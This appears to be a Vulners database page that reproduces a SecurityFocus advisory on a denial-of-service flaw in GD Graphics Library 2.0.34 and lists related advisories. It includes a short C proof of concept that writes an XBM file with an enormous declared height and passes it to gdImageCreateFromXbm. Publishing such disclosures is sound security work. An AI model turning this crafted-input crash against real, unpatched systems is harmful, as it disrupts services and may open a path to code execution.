GD Graphics Library 2.0.34 - 'libgd' gdImageCreateXbm Function Unspecified Denial of Service
| Reporter | Title | Published | Views | Family All 69 |
|---|---|---|---|---|
| gd -- multiple vulnerabilities | 21 Jun 200700:00 | – | freebsd | |
| libwmf -- multiple vulnerabilities | 12 Oct 200400:00 | – | freebsd | |
| Important: libwmf | 27 Oct 201500:00 | – | amazon | |
| Amazon Linux AMI : libwmf (ALAS-2015-604) | 29 Oct 201500:00 | – | nessus | |
| CentOS 4 / 5 : gd (CESA-2008:0146) | 29 Feb 200800:00 | – | nessus | |
| Fedora 7 : gd-2.0.35-1.fc7 (2007-2055) | 6 Nov 200700:00 | – | nessus | |
| Fedora Core 6 : gd-2.0.35-1.fc6 (2007-692) | 24 Sep 200700:00 | – | nessus | |
| Fedora 13 : libwmf-0.2.8.4-22.fc13 (2010-19022) | 5 Jan 201100:00 | – | nessus | |
| Fedora 14 : libwmf-0.2.8.4-27.fc14 (2010-19033) | 5 Jan 201100:00 | – | nessus | |
| FreeBSD : gd -- multiple vulnerabilities (6e099997-25d8-11dc-878b-000c29c5647f) | 1 Jul 200700:00 | – | nessus |
10
// source: https://www.securityfocus.com/bid/24651/info
The GD graphics library is prone to multiple vulnerabilities.
An attacker can exploit this issue to cause denial-of-service conditions or execute arbitrary code in the context of applications implementing the affected library.
Version prior to GD graphics library 2.0.35 are reported vulnerable.
#include "gd.h"
int main() {
FILE *fp = fopen("./x.xbm", "w+");
fprintf(fp, "#define width 255\n#define height 1073741824\nstatic unsigned char bla = {\n");
fseek(fp, 0, SEEK_SET);
gdImageCreateFromXbm(fp);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Dec 2013 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 24.3
EPSS0.13311